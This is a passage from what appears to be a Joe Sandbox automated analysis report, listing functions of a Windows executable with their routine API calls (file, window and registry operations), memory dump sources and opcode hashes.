                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                              • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                              • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                              • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                              Function 00416550 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                              • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                              • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                              • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                              Function 004149B4 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                              • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                              • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                              • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                              Function 004507C4 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                              • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                              • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                              • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                              Function 0042CCCC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                              • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                              • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                              • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                              Function 0042E8C8 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FormatMessage
                                                              • String ID:
                                                              • API String ID: 1306739567-0
                                                              • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                              • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                              • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                              • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                              Function 0041AF70 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ExtentPointText
                                                              • String ID:
                                                              • API String ID: 566491939-0
                                                              • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                              • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                              • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                              • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                              Function 004062E8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                              • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                              • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                              • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                              Function 0042DDE4 Relevance: 1.5, APIs: 1, Instructions: 26registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                              • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                              • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                              • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                              Function 00454BF8 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                              • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                              • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                              • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                              Function 0041467C Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                              • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                              • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                              • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                              Function 00406F10 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                              • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                              • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                              • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                              Function 0042364C Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                              • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersSystem$ShowWindow
                                                              • String ID:
                                                              • API String ID: 3202724764-0
                                                              • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                              • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                              • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                              • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                              Function 004242C4 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: TextWindow
                                                              • String ID:
                                                              • API String ID: 530164218-0
                                                              • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                              • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                              • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                              • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                              Function 00466B40 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                              • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                              • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                              • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                              Function 0042CD24 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                              • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                              • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                              • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                              Function 00406EC0 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                              • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                              • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                              • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                              Function 0045092C Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLast
                                                              • String ID:
                                                              • API String ID: 734332943-0
                                                              • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                              • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                              • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                              • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                              Function 004072A8 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                              Download Yara Rule
